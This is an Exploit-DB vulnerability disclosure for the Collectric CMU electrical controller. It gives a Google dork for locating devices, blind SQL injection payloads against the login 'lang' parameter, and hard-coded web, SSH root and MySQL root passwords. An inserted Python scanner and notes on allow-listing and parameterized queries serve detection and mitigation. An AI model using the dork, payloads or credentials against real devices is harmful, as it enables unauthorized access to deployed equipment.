Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection

EDB-ID: 45446
CVE: N/A
Platform: Hardware
Date: 2018-09-21


# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish-made controller device for electrical equipment such as car heaters,
# camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.

# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
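Both payloads above break out of a quoted string in the `lang` parameter of the login request and append either a numeric tautology (boolean-based blind) or a `SLEEP()` call (time-based blind). The script below is an added defensive example, not code from the advisory or from the vendor: it parses login request bodies shaped like the ones above, validates `lang` against an allow-list (the login form only ever submits fixed language names; `SWEDISH` comes from the advisory, `ENGLISH` is an assumed second value), and reports which indicator class fired. The sample request bodies are constructed for the demonstration and modelled on the payload format shown above.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Language names the login form is expected to submit. SWEDISH appears in the
# advisory payloads; ENGLISH is an assumed second value for illustration only.
ALLOWED_LANGS = {"SWEDISH", "ENGLISH"}

# Indicator patterns modelled on the two payload classes in the advisory.
INDICATORS = {
    # A quote character has no business in a language selector value.
    "quote-breakout": re.compile(r"['\"]"),
    # AND/OR followed by a numeric tautology such as 1320=1320.
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.IGNORECASE),
    # MySQL delay primitives used for time-based inference.
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE),
}

# Constructed sample request bodies (not real traffic): two shaped like the
# advisory payloads, two benign logins.
SAMPLE_REQUESTS = [
    "username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY"
    "&setcookie=setcookie&submit=Logga in",
    "username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY"
    "&setcookie=setcookie&submit=Logga in",
    "username=alice&lang=SWEDISH&password=secret&setcookie=setcookie&submit=Logga in",
    "username=bob&lang=ENGLISH&password=secret&submit=Logga in",
]


def classify_lang(value: str) -> List[str]:
    """Return the indicator names that fire on one 'lang' value.

    An empty list means the value is on the allow-list and needs no attention.
    A value outside the allow-list is reported even when no pattern matches,
    because a fixed-choice form field should never carry free text.
    """
    if value in ALLOWED_LANGS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return hits or ["not-in-allow-list"]


def scan_requests(bodies: List[str]) -> List[Dict]:
    """Parse each URL-encoded login body and report suspicious 'lang' values."""
    findings = []
    for idx, body in enumerate(bodies):
        params = parse_qs(body, keep_blank_values=True)
        for lang in params.get("lang", []):
            hits = classify_lang(lang)
            if hits:
                findings.append({"request": idx, "lang": lang, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(f"request #{finding['request']}: lang={finding['lang']!r} -> "
              f"{', '.join(finding['indicators'])}")
```

The allow-list check is the mitigation side of the same logic: a login handler that rejects any `lang` value not in `ALLOWED_LANGS` before building its query, and uses a parameterized query for the values it does accept, removes the injection point regardless of which suffix an attacker appends. The regex indicators are there for retrospective log review and alerting, where the application cannot be patched immediately.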


# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish-made controller device for electrical equipment such as car heaters, camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist; see my other vulnerability reports.

---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin

SSH user/root credentials:
username: kplc
password: kplc

username: root
password: zoogin

*The SSH server is running Dropbear sshd 0.52 (protocol 2.0), which requires the diffie-hellman-group1-sha1 key exchange.

MySQL root credentials:
username: root
password: sql4u
---